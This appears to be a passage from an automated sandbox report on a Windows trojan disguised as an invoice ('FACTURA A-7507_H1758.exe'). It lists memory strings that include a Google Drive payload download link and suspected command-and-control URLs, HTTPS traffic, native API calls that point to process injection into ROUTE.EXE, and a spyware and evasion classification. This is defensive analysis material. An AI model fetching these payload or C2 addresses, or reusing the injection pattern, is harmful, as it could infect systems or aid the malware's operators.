    Source: vCWtwarpbXUl.exe, 00000005.00000002.30691759310.0000000001466000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrl-llc.net/n7zc/
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.hostinger.com/hostinger-academy/dns/domain-default-img.svg
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004F16000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26722213547.00000000347C0000.00000004.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711441600.0000000004F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F31000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F2F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26612814198.0000000004F2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download5
    Source: E-1658-o.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: E-1658-o.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
    Source: ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
    Source: ROUTE.EXE, 00000004.00000003.26881340034.0000000002F48000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30460295215.0000000002F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
    Source: ROUTE.EXE, 00000004.00000002.30460295215.0000000002EDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
    Source: ROUTE.EXE, 00000004.00000003.26880300148.0000000007C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lichnyyrost.online&rand=
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-websi
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: ROUTE.EXE, 00000004.00000002.30463409490.00000000052AE000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004CFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.3bbfibre3app.net/xb3p/?2rul-=
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30463409490.000000000461E000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30463409490.000000000461E000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.000000000406E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
    Source: ROUTE.EXE, 00000004.00000002.30464673785.0000000007C9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: ROUTE.EXE, 00000004.00000003.26889367168.0000000007D0D000.00000004.00000020.00020000.00000000.sdmp, E-1658-o.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612530902.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711728970.0000000004F38000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: ROUTE.EXE, 00000004.00000002.30464534254.00000000061E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hostinger.com
    Source: FACTURA A-7507_H1758.exe, 00000000.00000002.26333035118.00000000028A0000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp, plot-im.jpg.0.dr, nsr3F9E.tmp.0.drString found in binary or memory: https://www.istockphoto.com/photo/license-gm618184124-?utm_medium=organic&amp;utm_source=google&amp;
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_la
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_l
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lichnyyrost.online&utm_medium=parking&utm_campaign=s_land
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000005440000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004E90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lichnyyrost.online&amp;reg_source=parking_auto
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownHTTPS traffic detected: 142.250.80.110:443 -> 192.168.11.20:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49791 version: TLS 1.2
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354734E0 NtCreateMutant,LdrInitializeThunk,2_2_354734E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_35472D10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_35472B90
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35473C30 NtOpenProcessToken,2_2_35473C30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35473C90 NtOpenThread,2_2_35473C90
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354738D0 NtGetContextThread,2_2_354738D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35474570 NtSuspendThread,2_2_35474570
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35474260 NtSetContextThread,2_2_35474260
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472D50 NtWriteVirtualMemory,2_2_35472D50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472DC0 NtAdjustPrivilegesToken,2_2_35472DC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472DA0 NtReadVirtualMemory,2_2_35472DA0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C50 NtUnmapViewOfSection,2_2_35472C50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C10 NtOpenProcess,2_2_35472C10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C20 NtSetInformationFile,2_2_35472C20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472C30 NtMapViewOfSection,2_2_35472C30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472CD0 NtEnumerateKey,2_2_35472CD0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472CF0 NtDelayExecution,2_2_35472CF0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472F00 NtCreateFile,2_2_35472F00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472F30 NtOpenDirectoryObject,2_2_35472F30
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472FB0 NtSetValueKey,2_2_35472FB0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472E50 NtCreateSection,2_2_35472E50
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472E00 NtQueueApcThread,2_2_35472E00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472EC0 NtQuerySection,2_2_35472EC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472ED0 NtResumeThread,2_2_35472ED0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472E80 NtCreateProcessEx,2_2_35472E80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472EB0 NtProtectVirtualMemory,2_2_35472EB0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354729D0 NtWaitForSingleObject,2_2_354729D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354729F0 NtReadFile,2_2_354729F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B00 NtQueryValueKey,2_2_35472B00
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B10 NtAllocateVirtualMemory,2_2_35472B10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B20 NtQueryInformationProcess,2_2_35472B20
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472BC0 NtQueryInformationToken,2_2_35472BC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472BE0 NtQueryVirtualMemory,2_2_35472BE0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472B80 NtCreateKey,2_2_35472B80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472A10 NtWriteFile,2_2_35472A10
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472AC0 NtEnumerateValueKey,2_2_35472AC0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472A80 NtClose,2_2_35472A80
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35472AA0 NtQueryInformationFile,2_2_35472AA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A4260 NtSetContextThread,LdrInitializeThunk,4_2_034A4260
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A4570 NtSuspendThread,LdrInitializeThunk,4_2_034A4570
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B00 NtQueryValueKey,LdrInitializeThunk,4_2_034A2B00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034A2B10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_034A2BC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B80 NtCreateKey,LdrInitializeThunk,4_2_034A2B80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034A2B90
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2A10 NtWriteFile,LdrInitializeThunk,4_2_034A2A10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034A2AC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2A80 NtClose,LdrInitializeThunk,4_2_034A2A80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A29F0 NtReadFile,LdrInitializeThunk,4_2_034A29F0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2F00 NtCreateFile,LdrInitializeThunk,4_2_034A2F00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2E50 NtCreateSection,LdrInitializeThunk,4_2_034A2E50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2E00 NtQueueApcThread,LdrInitializeThunk,4_2_034A2E00
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2ED0 NtResumeThread,LdrInitializeThunk,4_2_034A2ED0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_034A2D10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2DA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_034A2DA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C50 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034A2C50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_034A2C30
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2CF0 NtDelayExecution,LdrInitializeThunk,4_2_034A2CF0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A34E0 NtCreateMutant,LdrInitializeThunk,4_2_034A34E0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A38D0 NtGetContextThread,LdrInitializeThunk,4_2_034A38D0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2B20 NtQueryInformationProcess,4_2_034A2B20
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2BE0 NtQueryVirtualMemory,4_2_034A2BE0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2AA0 NtQueryInformationFile,4_2_034A2AA0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A29D0 NtWaitForSingleObject,4_2_034A29D0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2F30 NtOpenDirectoryObject,4_2_034A2F30
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2FB0 NtSetValueKey,4_2_034A2FB0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2EC0 NtQuerySection,4_2_034A2EC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2E80 NtCreateProcessEx,4_2_034A2E80
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2EB0 NtProtectVirtualMemory,4_2_034A2EB0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2D50 NtWriteVirtualMemory,4_2_034A2D50
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2DC0 NtAdjustPrivilegesToken,4_2_034A2DC0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C10 NtOpenProcess,4_2_034A2C10
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2C20 NtSetInformationFile,4_2_034A2C20
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A2CD0 NtEnumerateKey,4_2_034A2CD0
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A3C30 NtOpenProcessToken,4_2_034A3C30
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_034A3C90 NtOpenThread,4_2_034A3C90
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F061 NtQueryInformationProcess,NtReadVirtualMemory,4_2_0331F061
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F6D8 NtMapViewOfSection,4_2_0331F6D8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FB94 NtResumeThread,4_2_0331FB94
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FBF8 NtResumeThread,4_2_0331FBF8
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331FA78 NtResumeThread,4_2_0331FA78
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F948 NtMapViewOfSection,4_2_0331F948
    Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4_2_0331F891 NtMapViewOfSection,4_2_0331F891
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.00000000356D0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameroute.exej% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.00000000351BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003537C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA A-7507_H1758.exe
    Source: FACTURA A-7507_H1758.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@7/10@18/15
